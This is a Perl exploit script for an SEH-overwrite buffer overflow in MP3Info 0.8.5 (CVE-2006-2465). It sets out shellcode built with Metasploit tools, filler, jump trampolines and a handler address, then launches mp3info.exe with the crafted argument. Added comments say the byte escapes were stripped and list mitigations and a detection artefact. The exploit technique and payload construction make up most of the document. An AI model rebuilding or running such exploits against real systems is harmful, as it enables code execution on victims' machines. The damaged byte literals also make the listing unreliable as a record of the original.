MP3Info 0.8.5 SEH Buffer Overflow
Posted on 20 March 2014
# NOTE(review): this listing was damaged in extraction. Every "\x" escape has
# lost its backslash, so the string literals below are plain ASCII text ("x90",
# "x41", ...) rather than the byte values the author's comments describe, and
# the original line breaks were collapsed so that the whole script read as a
# single comment. The lines are split back out here; the literals are left
# exactly as found, so the script as shown does not reproduce the behaviour
# the header describes.
#
# Defender context, taken from the header only: an SEH-overwrite stack overflow
# in MP3Info 0.8.5 (CVE-2006-2465), reached through an oversized command-line
# argument. Mitigations for this class of bug are a fixed build from the vendor
# where one exists, and the OS-level SEH protections (SafeSEH/SEHOP) and DEP,
# which the author's "pop/pop/retn" handler-overwrite approach depends on being
# absent. The original line breaks are inferred from the comment/statement
# boundaries and are not guaranteed to match the author's file exactly.
#
# Style: the original has no `use strict; use warnings;` and uses package
# globals ($shellcode, $exploit, $seh); left as written, documentation only.
#
# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte but exploitation is still possible because of
# the little endian architecture provided that the return address gets placed at the end of the buffer,
# this however confines us in the tiny 4-byte area after pop/pop/retn
# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 bytes, enough to fit a calc payload
#
# run in the same directory of MP3Info, the exploit will launch mp3info with the payload as argument: perl mp3infosploit.pl
# mangled chars: F4->34 F3->33
# msfpayload windows/exec cmd=calc R | msfencode -b 'x00 d ax09' -t perl

# Payload string as generated by the msfencode command above (per the author's
# comment: windows/exec cmd=calc). With the escapes stripped in this copy it is
# just the ASCII text of the hex digits, not the encoded bytes.
$shellcode = "xdbxd4xbax2bxc5x7dxb7xd9x74x24xf4x58x29xc9" .
"xb1x32x31x50x17x83xe8xfcx03x7bxd6x9fx42x87" .
"x30xd6xadx77xc1x89x24x92xf0x9bx53xd7xa1x2b" .
"x17xb5x49xc7x75x2dxd9xa5x51x42x6ax03x84x6d" .
"x6bxa5x08x21xafxa7xf4x3bxfcx07xc4xf4xf1x46" .
"x01xe8xfax1bxdax67xa8x8bx6fx35x71xadxbfx32" .
"xc9xd5xbax84xbex6fxc4xd4x6fxfbx8exccx04xa3" .
"x2exedxc9xb7x13xa4x66x03xe7x37xafx5dx08x06" .
"x8fx32x37xa7x02x4ax7fx0fxfdx39x8bx6cx80x39" .
"x48x0fx5excfx4dxb7x15x77xb6x46xf9xeex3dx44" .
"xb6x65x19x48x49xa9x11x74xc2x4cxf6xfdx90x6a" .
"xd2xa6x43x12x43x02x25x2bx93xeax9ax89xdfx18" .
"xcexa8xbdx76x11x38xb8x3fx11x42xc3x6fx7ax73" .
"x48xe0xfdx8cx9bx45xf1xc6x86xefx9ax8ex52xb2" .
"xc6x30x89xf0xfexb2x38x88x04xaax48x8dx41x6c" .
"xa0xffxdax19xc6xacxdbx0bxa5x33x48xd7x2a";

# Buffer layout (author's comments): a 156-byte pad — presumably intended as
# 0x90 bytes, here the literal text "x90" repeated — then the payload, then
# 142 bytes of filler up to the SEH record.
$exploit = "x90"x156 . $shellcode;
$exploit .= "x41"x142;
# Trampoline described by the author as sitting in the 4 bytes reachable
# after the pop/pop/retn handler; opcodes given in the trailing comments.
$exploit .= # larger jump to beginning of buffer
"x58x58x58". # 58 POP EAX x 3
"x80xc4x02". # 80C4 02 ADD AH,2
"xFFxE0"; # FFE0 JMP EAX
$exploit .= "xEBxEFx90x90"; # short jmp back to get some space
#print length($exploit);
#exit(0);
print " ";
# Handler address, written as three bytes because of the leading null byte
# mentioned in the header (the fourth, 0x00, is supplied by the argument
# terminator — inferred from the header, not shown in code).
$seh = "x46x34x40"; # 0x00403446 mp3info.exe POP EBX
$exploit = $exploit . $seh;
# List-form system(): no shell is involved, the whole buffer is handed to
# mp3info.exe as a single argument, which is the vulnerable input per the
# header. From a detection standpoint, an mp3info.exe launch with a single
# ~540-byte argument is the observable artefact here.
system("mp3info.exe", $exploit);
